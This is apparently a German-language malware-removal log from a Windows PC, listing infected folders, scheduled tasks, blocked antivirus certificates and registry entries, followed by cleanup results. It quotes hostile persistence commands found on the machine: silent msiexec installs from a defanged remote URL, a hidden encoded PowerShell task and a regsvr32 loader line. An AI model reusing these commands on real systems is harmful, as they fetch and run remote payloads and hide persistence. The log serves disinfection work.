2017-05-11 18:05 - 2017-05-11 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-6671-0
2017-05-11 18:05 - 2017-05-11 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-6115-1
2017-05-11 15:23 - 2017-05-11 15:23 - 00000000 _____ C:\Windows\SysWOW64\3333333
2017-05-11 15:22 - 2017-05-11 15:22 - 00000000 _____ C:\Windows\SysWOW64\1111
2017-05-11 15:22 - 2017-05-11 15:22 - 00000000 _____ C:\Windows\SysWOW64\00
2017-05-11 14:03 - 2017-05-11 17:00 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\NPASRE
2017-05-09 18:05 - 2017-05-09 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-4d03-1
2017-05-09 18:05 - 2017-05-09 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-1147-0
2017-05-09 13:11 - 2017-05-09 17:00 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\VNASRE
2017-05-08 20:37 - 2017-05-13 20:17 - 00000000 ____D C:\ProgramData\{636564e6-512c-0}
2017-05-08 20:37 - 2017-05-13 20:17 - 00000000 ____D C:\ProgramData\{55b52545-312c-1}
2017-05-08 20:37 - 2017-05-13 20:17 - 00000000 ____D C:\ProgramData\{055b525f-612c-0}
2017-05-08 18:05 - 2017-05-08 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-3db3-1
2017-05-08 18:05 - 2017-05-08 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-2227-0
2017-05-08 16:50 - 2017-05-08 16:50 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\ANSARE
2017-05-08 16:43 - 2017-05-08 16:43 - 00000000 ____D C:\Users\Public\Documents\temp
2017-05-08 16:43 - 2017-05-08 16:43 - 00000000 ____D C:\Users\Public\Documents\chrome
2017-05-08 00:05 - 2017-05-08 00:05 - 00000000 ____D C:\ProgramData\f9d60eee-6423-0
2017-05-08 00:05 - 2017-05-08 00:05 - 00000000 ____D C:\ProgramData\f9d60eee-13c7-1
2017-05-07 18:05 - 2017-05-07 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-6415-1
2017-05-07 18:05 - 2017-05-07 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-3141-0
2017-05-05 18:05 - 2017-05-05 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-3ba3-1
2017-05-05 18:05 - 2017-05-05 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-0291-0
2017-05-05 14:10 - 2017-05-31 13:47 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\background_fault
2017-05-05 14:10 - 2017-05-05 17:00 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\WANARE
2017-05-05 14:10 - 2017-05-05 14:10 - 00000000 ____D C:\ProgramData\BIT
2017-05-04 00:06 - 2017-05-04 00:06 - 00000000 ____D C:\ProgramData\f9d60eee-5a03-0
2017-05-04 00:05 - 2017-05-04 00:06 - 00000000 ____D C:\ProgramData\f9d60eee-1c67-1
2017-05-03 22:04 - 2017-05-03 22:04 - 00000000 ____D C:\ProgramData\{93E26451-CD9A-43A5-A2FA-C42392EA4001}
2017-05-03 20:46 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\{E291433F-553A-F494-7993-5DB4F74EF600}
2017-05-03 20:46 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\{1F88CA98-A823-7D33-19C2-25D7F85A3115}
2017-05-03 20:46 - 2017-05-08 20:37 - 00000000 ____D C:\ProgramData\{30a66e80-412c-0}
2017-05-03 20:46 - 2017-05-08 20:37 - 00000000 ____D C:\ProgramData\{0f4d7d53-512c-0}
2017-05-03 20:46 - 2017-05-08 20:37 - 00000000 ____D C:\ProgramData\{00d223fb-612c-1}
2017-05-03 17:06 - 2017-05-07 12:24 - 00000000 _____ C:\Windows\SysWOW64\4
2017-05-03 15:17 - 2017-05-11 15:22 - 00000000 _____ C:\Windows\SysWOW64\1111111
2017-05-03 15:17 - 2017-05-03 21:00 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\SNAREA
2017-04-27 15:29 - 2017-04-27 15:29 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Everness
2017-04-27 15:28 - 2017-04-27 15:28 - 00000000 _____ C:\Windows\SysWOW64\33
2017-04-26 17:00 - 2017-05-05 17:00 - 00000000 ____D C:\Insist
2017-04-25 13:12 - 2017-05-05 16:02 - 00000000 ____D C:\Windows\psgo
2017-04-23 12:05 - 2017-05-03 20:46 - 00000000 ____D C:\ProgramData\f9d60eee-41d1-1
2017-04-23 12:05 - 2017-05-03 20:46 - 00000000 ____D C:\ProgramData\f9d60eee-04d5-0
2017-04-21 12:05 - 2017-04-21 12:05 - 00000000 ____D C:\ProgramData\f9d60eee-6bc1-0
2017-04-21 12:05 - 2017-04-21 12:05 - 00000000 ____D C:\ProgramData\f9d60eee-4b23-1
2017-04-20 18:05 - 2017-04-20 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-5761-1
2017-04-20 18:05 - 2017-04-20 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-3ce5-0
2017-04-20 12:31 - 2017-05-11 15:22 - 00000000 _____ C:\Windows\SysWOW64\22
2017-04-20 12:31 - 2017-05-11 15:22 - 00000000 _____ C:\Windows\SysWOW64\11
2017-04-19 18:05 - 2017-04-19 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-58d7-1
2017-04-19 18:05 - 2017-04-19 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-0091-0
2017-04-19 14:08 - 2017-05-07 13:38 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\3DM
2017-04-19 14:08 - 2017-05-03 20:46 - 00000000 ____D C:\ProgramData\{79ad3ae3-412c-1}
2017-04-19 14:08 - 2017-05-03 20:46 - 00000000 ____D C:\ProgramData\{74b842e5-112c-0}
2017-04-19 14:08 - 2017-05-03 20:46 - 00000000 ____D C:\ProgramData\{4bea5929-412c-0}
2017-04-14 12:05 - 2017-04-19 14:08 - 00000000 ____D C:\ProgramData\f9d60eee-6097-0
2017-04-14 12:00 - 2017-05-03 20:46 - 00000000 ____D C:\ProgramData\{341DC82C-83B6-7F87-DEF3-C97D7103A5DF}
2017-04-14 12:00 - 2017-04-19 14:08 - 00000000 ____D C:\ProgramData\f9d60eee-5791-0
2017-04-14 12:00 - 2017-04-19 14:08 - 00000000 ____D C:\ProgramData\{698332d3-212c-0}
2017-04-14 12:00 - 2017-04-19 14:08 - 00000000 ____D C:\ProgramData\{26445420-112c-1}
2017-04-14 12:00 - 2017-04-14 12:00 - 00003744 _____ C:\Windows\System32\Tasks\{C8763487-4C07-317B-EF0E-D6F917015462}
2017-04-14 12:00 - 2017-04-14 12:00 - 00000000 ____D C:\ProgramData\575f1242
2017-04-13 12:11 - 2017-05-25 12:06 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\SNARE
2017-04-10 13:59 - 2017-05-07 13:44 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\AMD
2017-04-10 13:59 - 2017-04-10 13:59 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\SNARER
2017-04-06 23:28 - 2017-05-07 13:34 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\clean
2017-04-04 00:34 - 2017-04-04 01:35 - 00003336 _____ C:\Windows\System32\Tasks\Update
2017-03-30 21:00 - 2017-05-05 17:00 - 00003520 _____ C:\Windows\System32\Tasks\Windows-PG
2017-03-30 21:00 - 2017-03-30 21:00 - 00000000 ____D C:\Update
2017-03-29 10:46 - 2017-03-29 10:46 - 00000000 ____D C:\Program Files (x86)\temp
2017-03-28 19:41 - 2017-03-28 19:41 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Firefox
2017-03-28 19:39 - 2017-03-28 19:39 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Firefox
2017-03-28 19:39 - 2017-03-28 19:39 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Yeshat
2017-03-28 19:38 - 2017-04-01 11:33 - 00000000 _____ C:\Windows\SysWOW64\3
2017-03-27 14:45 - 2017-03-27 14:45 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\clean
2017-03-17 12:39 - 2017-03-17 12:39 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\BrowserModule
2017-03-17 12:37 - 2017-04-14 12:00 - 00000000 ____D C:\ProgramData\5aceedc5-7cf5-1
2017-03-17 12:37 - 2017-04-14 12:00 - 00000000 ____D C:\ProgramData\5aceedc5-3161-0
2017-03-17 12:20 - 2017-06-01 12:00 - 00003614 _____ C:\Windows\System32\Tasks\Milimili
2017-03-17 12:20 - 2017-05-07 13:41 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Kyubey
2017-03-17 12:20 - 2017-03-17 14:16 - 00000000 ____D C:\Program Files (x86)\MIO
2017-03-17 12:19 - 2017-06-01 12:00 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\WinSAPSvc
2017-03-17 12:19 - 2017-03-21 15:08 - 00000000 ____D C:\Program Files (x86)\BikaQRss
2017-03-17 00:03 - 2017-03-17 00:04 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Mikghbiritain
2017-03-17 00:03 - 2017-03-17 00:03 - 00006020 _____ C:\Windows\System32\Tasks\Qizsywosale Core
2017-03-17 00:03 - 2017-03-17 00:03 - 00003992 _____ C:\Windows\System32\Tasks\Perkeentgreserk
2017-03-17 00:03 - 2017-03-17 00:03 - 00000000 ____D C:\Program Files (x86)\Qizsywosale Core
2017-03-13 23:02 - 2017-03-13 23:02 - 03164345 _____ C:\Windows\455cd42b03953ae3030f3e9254843325.exe
2017-06-05 10:11 - 2016-11-16 18:44 - 00000354 _____ C:\Users\Public\Documents\temp.dat
2017-05-31 14:36 - 2016-11-23 19:13 - 01784108 _____ C:\spyhunter.fix
2017-05-29 22:00 - 2016-01-02 17:50 - 00000306 __RSH C:\ProgramData\ntuser.pol
2017-05-17 21:05 - 2015-12-28 13:23 - 00000000 ____D C:\Users\Nick Schuster\Desktop\982652986578268672
2016-07-31 15:02 - 2016-07-31 15:02 - 7129600 _____ () C:\Users\Nick Schuster\AppData\Roaming\agent.dat
2017-01-03 13:27 - 2017-01-03 13:20 - 1052256 _____ () C:\Users\Nick Schuster\AppData\Roaming\avv.exe
2016-07-31 15:01 - 2016-07-31 15:01 - 0129024 _____ () C:\Users\Nick Schuster\AppData\Roaming\Installer.dat
2016-07-31 15:02 - 2016-07-31 15:02 - 0018432 _____ () C:\Users\Nick Schuster\AppData\Roaming\Main.dat
2016-07-31 15:03 - 2016-02-18 10:10 - 5267952 _____ () C:\Users\Nick Schuster\AppData\Roaming\ziptool_wc-9015_setup.exe
2017-04-04 00:34 - 2017-04-04 13:52 - 0000000 _____ () C:\Users\Nick Schuster\AppData\Roaming\Microsoft\taskhw.exe
CustomCLSID: HKU\S-1-5-21-3847841184-804715454-2304624315-1001_Classes\CLSID\{D3BB05A4-7B0B-D6FE-9C46-02343C11E1C8}\InprocServer32 -> kein Dateipfad
CustomCLSID: HKU\S-1-5-21-3847841184-804715454-2304624315-1001_Classes\CLSID\{DC9D74AA-7319-69B5-E1DE-59842454B0BE}\InprocServer32 -> kein Dateipfad
Task: {006195E7-5B35-4800-8C6E-E8E48BDE5D59} - System32\Tasks\KMSAutoNet => C:\ProgramData\KMSAutoS\KMSAuto Net.exe 
C:\ProgramData\KMSAutoS
Task: {12EA2644-53AB-4F3B-8420-DDC68495A6C2} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1
Task: {1400CED9-EAA0-49F8-A50B-2477914720B4} - System32\Tasks\Games\UpdateCheck_S-1-5-21-3847841184-804715454-2304624315-1001
Task: {16129431-3A87-44D6-B1E9-5B37A253A591} - System32\Tasks\RunAtStartup => C:\Users\Nick Schuster\AppData\Roaming\Event Monitor\em.exe  <==== ACHTUNG
C:\Users\Nick Schuster\AppData\Roaming\Event Monitor
Task: {169116B2-0EF1-475C-8491-807AAB8364E3} - System32\Tasks\Microsoft\Windows\DeviceSettings\Puperpysikuy => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&amp;d=20170529 /q <==== ACHTUNG
Task: {2A619B04-44F2-4A39-B52E-0AD07E393C91} - System32\Tasks\Prervadom Cloud => C:\Program Files (x86)\Mlecultfowudom\zerfotain.exe 
C:\Program Files (x86)\Mlecultfowudom
Task: {2E2640BC-9462-4C5F-90BD-892338D59DF4} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-06-01] () <==== ACHTUNG
C:\Program Files (x86)\MIO
Unlock: C:\Windows\System32\Tasks\Update
CMD: type "C:\Windows\System32\Tasks\Update"
Task: {6AFC3B2B-BD1E-4624-B0FF-60E210D98357} - \task Update -> Keine Datei <==== ACHTUNG
Task: {72FEC8A9-7468-4164-9720-A650AB414362} - System32\Tasks\ttwifi => C:\Program Files (x86)\ttwifi\tiantianwifi.exe  <==== ACHTUNG
C:\Program Files (x86)\ttwifi
Task: {74DECB46-8172-4D8D-A795-B4201324F918} - System32\Tasks\Qizsywosale Core => C:\Program Files (x86)\Fepuly\xruvudom.exe 
C:\Program Files (x86)\Fepuly
Task: {7DF225F2-E9BE-467E-BBE5-6136CE240342} - System32\Tasks\Quick Tharks Screen Saver => Rundll32.exe "C:\Program Files\Quick Tharks Screen Saver\Quick Tharks Screen Saver.dll",eJRVBzCDxduB
C:\Program Files\Quick Tharks Screen Saver
Task: {9BC09D15-0FE3-42E6-917C-A7AEE41F44B8} - System32\Tasks\Samsung Update => msiexec.exe /i hxxp://D2Buh1bF1G584W.CLouDfRoNT.net/mmtsk/occup.php?p=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&amp;d=20170418 /q <==== ACHTUNG
Task: {A885A6AF-A8B5-484C-9416-15C01E02D67D} - System32\Tasks\fyKiuMkkXh => C:\Program Files (x86)\XIOLoa7MyU\updengine.exe  <==== ACHTUNG
C:\Program Files (x86)\XIOLoa7MyU
Task: {B109EF88-6721-40A7-B261-9D175E298958} - System32\Tasks\Coobeck Monitor => C:\Program Files (x86)\Arucerther\yaupdcache.exe 
C:\Program Files (x86)\Arucerther
Task: {B76D98BF-21F4-4F78-A43A-95F8B72AD43D} - System32\Tasks\{0B047F47-0F0A-0408-0B11-087F0C0B110F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ADsAIAAgADsAOwA7ACAAIAAgADsAOwAgADsAOwA7ADsAIAA7ADsAOwA7ADsAOwA7ACAAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA (Der Dateneintrag hat 9580 mehr Zeichen). <==== ACHTUNG
Task: {D18984F6-6A81-40A8-A7A5-020084C99227} - System32\Tasks\{C8763487-4C07-317B-EF0E-D6F917015462} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\575f1242\3bf5ca72.dll" <==== ACHTUNG
C:\programdata\575f1242
Task: {D66B17AC-FEAC-46B3-A7DF-3865C135032C} - System32\Tasks\Microsoft\Windows\MemoryDiagnostic\VideoMemoryDiagnostic => C:\\ProgramData\\VideoMemoryDiagnostic\\vmdiag.exe [2017-05-26] ()
C:\ProgramData\VideoMemoryDiagnostic
Task: {D74DB4BE-DE57-43E2-97AF-575D2663AEE8} - System32\Tasks\Perkeentgreserk => msiexec.exe /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&amp;v=20170316 /q <==== ACHTUNG
Task: {E6C4E4E8-090E-49DF-8E3F-70FC88E8E56F} - System32\Tasks\{25FE2E5B-9255-99F0-1368-8A42E54326C9} => C:\ProgramData\{279BD4C5-9030-636E-34A5-319E03364EE3}\63E4E652-D44F-51F9-5689-B0A4B2295152.exe [2017-06-02] () <==== ACHTUNG
C:\ProgramData\{279BD4C5-9030-636E-34A5-319E03364EE3}
Task: {EC667399-8041-43FD-BACE-C95F53D20EC6} - System32\Tasks\SoftUpgrade => C:\Program Files (x86)\SoftUpgrade\softup.exe [2017-05-29] () <==== ACHTUNG
C:\Program Files (x86)\SoftUpgrade
Task: {F51F669D-34D8-49E3-9371-1DA093A90419} - System32\Tasks\Gerfety Renew => C:\Program Files (x86)\Prfasaretaly\yaupdcache.exe [2017-05-29] ()
C:\Program Files (x86)\Prfasaretaly
WMI_ActiveScriptEventConsumer_ASEC: <===== ACHTUNG
Shortcut: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Applemy\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\Online Help.lnk -> hxxp://www.virtualdj.com/wiki
Shortcut: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\www.virtualdj.com.lnk -> hxxp://www.virtualdj.com
Shortcut: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Applemy\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Intеrnеt Ехрlоrеr.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) <===== Cyrillic
Shortcut: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\d6731079c9ca4513\Google Chrome.lnk -> C:\Program Files (x86)\Applemy\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\9501e18d7c2ab92e\CyberLyric - Chrome.lnk -> C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\9501e18d7c2ab92e ()
Shortcut: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\8e5c0db72600a899\Google Chrome.lnk -> C:\Program Files (x86)\Applemy\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\82c1ad0bea96409d\CyberLyric - Chrome.lnk -> C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\82c1ad0bea96409d ()
Shortcut: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\CyberLyric - Chrome.lnk -> C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9 ()
C:\Program Files (x86)\Applemy
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Classes\regfile: regedit.exe "%1" <===== ACHTUNG
Unlock: C:\Windows\system32\Drivers\etc\hosts
C:\Windows\system32\Drivers\etc\hosts
MSCONFIG\Services: AppleAppSvc => 2
MSCONFIG\Services: Kitty => 2
MSCONFIG\Services: pgt_svc => 2
MSCONFIG\Services: srcsrv => 2
HKLM\...\StartupApproved\Run: => "vnlgp"
HKLM\...\StartupApproved\Run: => "gplyra"
HKLM\...\StartupApproved\Run32: => "KMS"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\StartupFolder: => "smss.exe"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "HKOEGBGL4X"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "tsiVideo"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "6CC2RLD170"
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ACHTUNG
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (U)
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (U)
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (U)
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (U)
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (U)
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ACHTUNG
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (U)
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (U)
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ACHTUNG
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ACHTUNG
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (U)
HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (U)
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ACHTUNG
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (U)
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ACHTUNG
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (U)
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (U)
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ACHTUNG
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ACHTUNG
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (U)
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ACHTUNG
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ACHTUNG
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ACHTUNG
Hosts:
RemoveProxy:
CMD: ipconfig /flushdns
CMD: netsh winsock reset
EmptyTemp: 
*****************

Prozesse erfolgreich geschlossen.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\gplyra => Wert erfolgreich entfernt
C:\Users\Nick Schuster\AppData\Roaming\gplyra => erfolgreich verschoben
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\KMS => Wert erfolgreich entfernt
"C:\Windows\kmsonboot" => nicht gefunden.
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\\RAZERLAP => Wert nicht gefunden.
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\\windows => Wert erfolgreich entfernt
C:\ProgramData\windows => erfolgreich verschoben
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{3b90a8ba-330f-11e7-83e4-0071c2420bd3} => Schl黶sel erfolgreich entfernt
HKCR\CLSID\{3b90a8ba-330f-11e7-83e4-0071c2420bd3} => Schl黶sel nicht gefunden. 
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{e8e722cc-412b-11e7-840b-0071c2420bd3} => Schl黶sel erfolgreich entfernt
HKCR\CLSID\{e8e722cc-412b-11e7-840b-0071c2420bd3} => Schl黶sel nicht gefunden. 
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell => Wert erfolgreich entfernt
C:\Users\Nick Schuster\AppData\Roaming\avv.exe => erfolgreich verschoben
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\sG4nE4Ad85qJ.exe => Wert erfolgreich entfernt
C:\ProgramData\e9cf343f516c47a4a7255147ad1dcd13 => erfolgreich verschoben
HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\6ddy6fjk => Schl黶sel erfolgreich entfernt
HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\\order 6ddy6fjk => erfolgreich entfernt
C:\Program Files (x86)\Qizsywosale Core => erfolgreich verschoben
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdate.exe => Schl黶sel erfolgreich entfernt
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdaterService.exe => Schl黶sel erfolgreich entfernt
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\rstrui.exe => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{5EBD559E-A5BA-11E6-B9FD-64006A5CFC23} => Wert erfolgreich entfernt
HKCR\CLSID\{5EBD559E-A5BA-11E6-B9FD-64006A5CFC23} => Schl黶sel nicht gefunden. 
C:\Users\Nick Schuster\AppData\Roaming\Phucusy => erfolgreich verschoben
HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{9C829CE8-039A-11E7-8F7F-64006A5CFC23} => Wert erfolgreich entfernt
HKCR\CLSID\{9C829CE8-039A-11E7-8F7F-64006A5CFC23} => Schl黶sel nicht gefunden. 
"C:\Users\Nick Schuster\AppData\Roaming\Anerpe" => nicht gefunden.
HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{234628B4-4048-11E7-9F2C-64006A5CFC23} => Wert erfolgreich entfernt
HKCR\CLSID\{234628B4-4048-11E7-9F2C-64006A5CFC23} => Schl黶sel nicht gefunden. 
C:\Users\Nick Schuster\AppData\Roaming\Grerdaentlerveck => erfolgreich verschoben
HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{A4CD8824-4049-11E7-9F11-64006A5CFC23} => Wert erfolgreich entfernt
HKCR\CLSID\{A4CD8824-4049-11E7-9F11-64006A5CFC23} => Schl黶sel nicht gefunden. 
C:\Users\Default\AppData\Roaming\Minerent => erfolgreich verschoben
